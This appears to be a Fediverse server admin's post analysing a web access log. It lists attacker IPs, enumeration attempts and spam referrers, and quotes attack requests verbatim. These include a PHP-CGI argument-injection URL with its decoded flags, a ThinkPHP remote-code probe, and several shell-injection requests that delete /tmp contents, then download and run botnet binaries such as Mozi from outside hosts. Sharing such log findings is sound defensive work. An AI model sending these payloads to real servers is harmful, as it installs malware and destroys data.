León Castillejos @L1Cafe@social.privacytools.io

Did not clear my access log for some time, amassing over 300MBs.

What I looked at

Common attack patterns (SQLi, BOF, path traversal etc.)
Common attack URLs (e.g. https://github.com/danielmiessler/SecLists/)
Bad and unusual HTTP status codes
POST requests against unusual places (no inbox, push)

Findings

One IP tries to actively enumerate Fedi accounts: 75.64.236[.]168
241 IPs tried to blindly exploit non-fedi-specific services, e.g. SQL injects, posting shells
53 IPs did enumeration only, looking exploitable services and shells
Most popular was checking for Wordpress, phpMyAdmin and looking for existing shells
The crawler from fediverse[.]space seems okay, but if you want to block: 64.227.114[.]249

Details

Top attackers

211.21.226[.]123 Taiwan 122.14.213[.]79 China 113.53.230[.]34 Thailand 150.109.78[.]53 Singapore 118.25.38[.]1 China 118.25.111[.]38 China 106.12.40[.]125 China 103.45.99[.]20 China 47.199.217[.]59 US

The longest attack URL, used by many Chinese attackers

"POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1"

This URL decodes to:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

I’d rather not Think PHP, thanks

"GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"

Ask and thou shalt receive. 16 attackers asked for a shell.

GET /shell.php HTTP/1.1

Kinda cute

"GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.137.154[.]33/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 146 "-" "Hello, world" "-" "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.13.206[.]99:34286/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1"

Top unusal request lines

24 "https[:]//volcable.ru/" 21 "https[:]//jyvopys.com/" 18 "https[:]//vulkan-platinym24.ru/" 18 "https[:]//sexjk.com/" 18 "https[:]//glassdeskguide.com/" 18 "https[:]//dezgorkontrol.ru/" 18 "https[:]//brendof-club.com/" 18 "https[:]//arabic-poetry.com/" 18 "http[:]//hacron.ru/" 15 "https[:]//se.painting-planet.com/" 15 "https[:]//landofgames.ru/"

#fediadmin #mastoadmin

@amolith you can make your CI catching some of them:

https://git.shivering-isles.com/shivering-isles/blog/-/blob/deploy/.gitlab-ci.yml#L10

Always a good thing to throw an analyzer at your stuff before publishing